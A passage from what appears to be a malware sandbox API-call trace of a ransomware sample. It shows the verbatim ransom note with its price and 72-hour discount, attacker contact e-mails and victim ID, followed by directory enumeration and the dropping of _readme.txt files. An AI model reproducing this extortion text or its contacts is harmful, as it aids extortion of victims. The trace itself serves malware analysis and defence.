hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.221] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.223] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*" (normalized: "c:\\boot\\nb-no\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.224] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.224] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.224] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.224] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.225] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.259] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0184.259] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.259] PathFindFileNameW (pszPath="C:\\") 